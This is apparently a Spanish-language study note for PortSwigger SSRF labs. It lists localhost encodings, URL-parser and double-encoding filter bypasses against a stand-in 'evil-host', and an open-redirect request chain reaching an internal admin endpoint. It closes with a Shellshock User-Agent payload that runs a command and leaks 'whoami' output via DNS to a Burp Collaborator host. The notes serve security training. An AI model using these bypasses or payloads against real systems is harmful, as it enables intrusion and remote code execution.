PortSwigger SSRF Blind Filter Bypass Shellshock

SSRF — Server-Side Request Forgery

Bypass de filtros de URL, redirecciones abiertas y explotación blind con Burp Collaborator.

Otras formas de llamar al localhost

Equivalentes a 127.0.0.1
127.0.0.1
2130706433         # decimal
017700000001       # octal
127.1
spoofed.burpcollaborator.net

Bypass de URL parsing

Técnicas de bypass
# Credenciales antes del hostname con @
https://expected-host:fakepassword@evil-host

# Fragment # para confundir al parser
https://evil-host#expected-host

# Subdominio del host esperado bajo dominio controlado
https://expected-host.evil-host
Double URL encoding bypass
http://localhost:80%[email protected]/admin/delete?username=carlos

Bypassing SSRF filters via open redirection

Si existe un open redirect en /product/nextProduct?currentProductId=6&path=http://evil-user.net, se puede abusar para bypassear filtros SSRF:

POST /product/stock
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

Blind SSRF — Out-of-band detection

Fijarse bien en el header Referer — puede estar haciendo una consulta a un sitio externo.
Blind SSRF Referer header

Blind SSRF — Shellshock exploitation

User-Agent payload
() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN
Blind SSRF Shellshock result